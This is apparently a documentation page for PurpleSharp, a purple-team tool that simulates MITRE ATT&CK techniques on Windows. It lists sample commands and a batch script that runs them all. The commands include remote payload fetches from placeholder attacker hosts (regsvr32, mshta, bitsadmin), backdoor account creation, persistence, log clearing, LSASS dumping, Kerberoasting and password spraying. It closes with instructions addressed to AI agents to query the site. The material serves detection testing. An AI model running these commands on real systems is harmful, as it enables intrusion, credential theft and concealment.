# PurpleSharp ``` Command and Scripting Interpreter: PowerShell .\PurpleSharp_x64.exe /t T1059.001 Variation 1 This module uses the Win32 API CreateProcess to execute a specific command: powershell -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA== Variation 2 This module uses the the System.Management.Automation .NET namespace to execute the same script. Command and Scripting Interpreter: Windows Command Shell .\PurpleSharp_x64.exe /t T1059.003 This module uses the Win32 API CreateProcess to execute a specific command: cmd.exe /C whoami Command and Scripting Interpreter: Visual Basic .\PurpleSharp_x64.exe /t T1059.005 This module uses the Win32 API CreateProcess to execute a specific command: wscript.exe invoice0420.vbs Command and Scripting Interpreter: JavaScript/JScript .\PurpleSharp_x64.exe /t T1059.007 This module uses the Win32 API CreateProcess to execute a specific command: wscript.exe invoice0420.js System Services: Service Execution .\PurpleSharp_x64.exe /t T1569.002 This module uses the Win32 API CreateProcess to execute a specific command: net start UpdaterService Scheduled Task/Job: Scheduled Task .\PurpleSharp_x64.exe /t T1053.005 This module uses the Win32 API CreateProcess to execute a specific command: SCHTASKS /CREATE /SC DAILY /TN BadScheduledTask /TR “C:WindowsTempxyz12345.exe” /ST 13:00 Create Account: Local Account .\PurpleSharp_x64.exe /t T1136.001 Variation 1 This module uses the Win32 API NetUserAdd to create a local account. Variation 2 This module uses the Win32 API CreateProcess to execute a specific command: net user hax0r Passw0rd123El7 /add Create or Modify System Process: Windows Service .\PurpleSharp_x64.exe /t T1543.003 Variation 1 This module uses the Win32 API CreateService to create a Windows Service. Variation 2 This module uses the Win32 API CreateProcess to execute a specific command: sc create UpdaterService binpath= C:WindowsTempsuperlegit.exe type= own start= auto Boot or Logon Autostart Execution: Registry Run Keys .\PurpleSharp_x64.exe /t T1547.001 Variation 1 This module uses the the Microsoft.Win32 .NET namespace to create a Registry Key. Variation 2 This module uses the Win32 API CreateProcess to execute a specific command: REG ADD HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun /V BadApp /t REG_SZ /F /D C:WindowsTempxyz12345.exe Event Triggered Execution: Windows Management Instrumentation Event Subscription .\PurpleSharp_x64.exe /t T1546.003 This module uses the System.Management .NET namespace to create the main pieces of a WMI Event Subscription: an Event Filter, an Event Consumer and a FilterToConsumerBinding. Signed Binary Proxy Execution: Regsvr32 .\PurpleSharp_x64.exe /t T1218.010 This module uses the CreateProcess Win32 API to execute regsvr32.exe /u /n /s /i:http://malicious.domain:8080/payload.sct scrobj.dll Signed Binary Proxy Execution: Regsvcs/Regasm .\PurpleSharp_x64.exe /t T1218.009 This module uses the CreateProcess Win32 API to execute C:WindowsMicrosoft.NETFrameworkv4.0.30319regsvcs.exe /U winword.dll Signed Binary Proxy Execution: InstallUtil .\PurpleSharp_x64.exe /t T1218.004 This module uses the CreateProcess Win32 API to execute C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe /logfiles /LogToConsole=alse /U C:WindowsTempXKNqbpzl.exe Deobfuscate/Decode Files or Information .\PurpleSharp_x64.exe /t T1140 This module uses the CreateProcess Win32 API to execute certutil.exe -decode encodedb64.txt decoded.exe Signed Binary Proxy Execution: Mshta .\PurpleSharp_x64.exe /t T1218.005 This module uses the CreateProcess Win32 API to execute mshta.exe http://webserver/payload.hta Signed Binary Proxy Execution: CMSTP .\PurpleSharp_x64.exe /t T1218.003 This module uses the CreateProcess Win32 API to execute cmstp.exe /s /ns C:UsersAdministratorAppDataLocalTempXKNqbpzl.txt BITS Jobs .\PurpleSharp_x64.exe /t T1197 This module uses the CreateProcess Win32 API to execute bitsadmin.exe /transfer job /download /priority high http://web.evil/sc.exe C:WindowsTempwinword.exe Signed Binary Proxy Execution: Rundll32 .\PurpleSharp_x64.exe /t T1218.011 This module uses the CreateProcess Win32 API to execute rundll32.ex C:Windowstwain_64.dll Indicator Removal on Host: Clear Windows Event Logs .\PurpleSharp_x64.exe /t T1070.001 Variation 1 This module uses the System.Diagnostics .NET namespace to delete the Security Event Log. Variation 2 This module uses the Win32 API CreateProcess to execute a specific command: wevtutil.exe cl Security XSL Script Processing .\PurpleSharp_x64.exe /t T1220 This module uses the CreateProcess Win32 API to execute wmic.exe os get /FORMAT “http://webserver/payload.xsl”: Process Injection: Portable Executable Injection .\PurpleSharp_x64.exe /t T1055.002 This module uses the CreateProcess, OpenProcess, VirtualAllocEx, WriteProcessMemory and CreateRemoteThread Win32 API functions to inject an innocuous shellcode. Process Injection: Asynchronous Procedure Call .\PurpleSharp_x64.exe /t T1055.004 This module uses the CreateProcess, OpenProcess, VirtualAllocEx, WriteProcessMemory and QueueUserAPC Win32 API functions to inject an innocuous shellcode. Brute Force: Password Spraying .\PurpleSharp_x64.exe /t T1110.003 Variation 1 This module uses the LogonUser Win32 API to test a single password across random users obtained via LDAP. Variation 2 This module uses the WNetAddConnection2 Win32 API to test a single password across random users and random hosts obtained via LDAP. Steal or Forge Kerberos Tickets: Kerberoasting .\PurpleSharp_x64.exe /t T1558.003 This module uses the KerberosRequestorSecurityToken Class to obtain Kerberos service tickets. OS Credential Dumping: LSASS Memory .\PurpleSharp_x64.exe /t T1003.001 This module uses the GetProcessesByName and MiniDumpWriteDump Win32 API functions to create a memory dump of the lsass.exe process. System Network Configuration Discovery .\PurpleSharp_x64.exe /t T1016 This module uses the CreateProcess Win32 API to execute ipconfig.exe /all” File and Directory Discovery .\PurpleSharp_x64.exe /t T1083 This module uses the CreateProcess Win32 API to execute dir.exe c:>> %temp%download dir.exe C:Users>> %temp%download Network Share Discovery .\PurpleSharp_x64.exe /t T1135 This module uses the NetShareEnum Win32 API function to enumerate shared on remote endpoints randomly picked using LDAP. Network Service Scanning .\PurpleSharp_x64.exe /t T1046 This module uses the System.Net.Sockets .NET namespace to scan ports on remote endpoints randomly picked using LDAP. Account Discovery: Local Account .\PurpleSharp_x64.exe /t T1087.001 This module uses the CreateProcess Win32 API to execute net.exe user Account Discovery: Domain Account .\PurpleSharp_x64.exe /t T1087.002 Variation 1 This module uses the Sytem.DirectoryServices .NET NameSpace to query a domain environment using LDAP. Variation 2 This module uses the CreatePRocess Win32 API to execute: net.exe user /domain System Service Discovery .\PurpleSharp_x64.exe /t T1007 This module uses the CreateProcess Win32 API to execute net.exe start tasklist.exe /svc System Owner/User Discovery .\PurpleSharp_x64.exe /t T1033 This module uses the CreateProcess Win32 API to execute whoami.exe query user System Network Connections Discovery .\PurpleSharp_x64.exe /t T1049 This module uses the CreateProcess Win32 API to execute netstat.exee net.exe use net.exe sessions Remote Services: Windows Remote Management .\PurpleSharp_x64.exe /t T1021.006 ``` Audit.bat. Download latest binary and run the following to perform all simulations ``` @echo off ECHO "Command and Scripting Interpreter: PowerShell" .\PurpleSharp_x64.exe /t T1059.001 timeout /t 5 ECHO "Command and Scripting Interpreter: Windows Command Shell" .\PurpleSharp_x64.exe /t T1059.003 timeout /t 5 ECHO "Command and Scripting Interpreter: Visual Basic" .\PurpleSharp_x64.exe /t T1059.005 timeout /t 5 ECHO "Command and Scripting Interpreter: JavaScript/JScript" .\PurpleSharp_x64.exe /t T1059.007 timeout /t 5 ECHO "System Services: Service Execution" .\PurpleSharp_x64.exe /t T1569.002 timeout /t 5 ECHO "Scheduled Task/Job: Scheduled Task" .\PurpleSharp_x64.exe /t T1053.005 timeout /t 5 ECHO "Create Account: Local Account" .\PurpleSharp_x64.exe /t T1136.001 timeout /t 5 ECHO "Create or Modify System Process: Windows Service" .\PurpleSharp_x64.exe /t T1543.003 timeout /t 5 ECHO "Boot or Logon Autostart Execution: Registry Run Keys" .\PurpleSharp_x64.exe /t T1547.001 timeout /t 5 ECHO "Event Triggered Execution: Windows Management Instrumentation Event Subscription" .\PurpleSharp_x64.exe /t T1546.003 timeout /t 5 ECHO "Signed Binary Proxy Execution: Regsvr32" .\PurpleSharp_x64.exe /t T1218.010 timeout /t 5 ECHO "Signed Binary Proxy Execution: Regsvcs/Regasm" .\PurpleSharp_x64.exe /t T1218.009 timeout /t 5 ECHO "Signed Binary Proxy Execution: InstallUtil" .\PurpleSharp_x64.exe /t T1218.004 timeout /t 5 ECHO "Deobfuscate/Decode Files or Information" .\PurpleSharp_x64.exe /t T1140 timeout /t 5 ECHO "Signed Binary Proxy Execution: Mshta" .\PurpleSharp_x64.exe /t T1218.005 timeout /t 5 ECHO "Signed Binary Proxy Execution: CMSTP" .\PurpleSharp_x64.exe /t T1218.003 timeout /t 5 ECHO "BITS Jobs" .\PurpleSharp_x64.exe /t T1197 timeout /t 5 ECHO "Signed Binary Proxy Execution: Rundll32" .\PurpleSharp_x64.exe /t T1218.011 timeout /t 5 ECHO "Indicator Removal on Host: Clear Windows Event Logs" .\PurpleSharp_x64.exe /t T1070.001 timeout /t 5 ECHO "XSL Script Processing" .\PurpleSharp_x64.exe /t T1220 timeout /t 5 ECHO "Process Injection: Portable Executable Injection" .\PurpleSharp_x64.exe /t T1055.002 timeout /t 5 ECHO "Process Injection: Asynchronous Procedure Call" .\PurpleSharp_x64.exe /t T1055.004 timeout /t 5 ECHO "Brute Force: Password Spraying" .\PurpleSharp_x64.exe /t T1110.003 timeout /t 5 ECHO "Steal or Forge Kerberos Tickets: Kerberoasting" .\PurpleSharp_x64.exe /t T1558.003 timeout /t 5 ECHO "OS Credential Dumping: LSASS Memory" .\PurpleSharp_x64.exe /t T1003.001 timeout /t 5 ECHO "System Network Configuration Discovery" .\PurpleSharp_x64.exe /t T1016 timeout /t 5 ECHO "File and Directory Discovery" .\PurpleSharp_x64.exe /t T1083 timeout /t 5 ECHO "Network Share Discovery" .\PurpleSharp_x64.exe /t T1135 timeout /t 5 ECHO "Network Service Scanning" .\PurpleSharp_x64.exe /t T1046 timeout /t 5 ECHO "Account Discovery: Local Account" .\PurpleSharp_x64.exe /t T1087.001 timeout /t 5 ECHO "Account Discovery: Domain Account" .\PurpleSharp_x64.exe /t T1087.002 timeout /t 5 ECHO "System Service Discovery" .\PurpleSharp_x64.exe /t T1007 timeout /t 5 ECHO "System Owner/User Discovery" .\PurpleSharp_x64.exe /t T1033 timeout /t 5 ECHO "System Network Connections Discovery" .\PurpleSharp_x64.exe /t T1049 timeout /t 5 ECHO "Remote Services: Windows Remote Management" .\PurpleSharp_x64.exe /t T1021.006 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.jdksec.com/guides/purplesharp.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.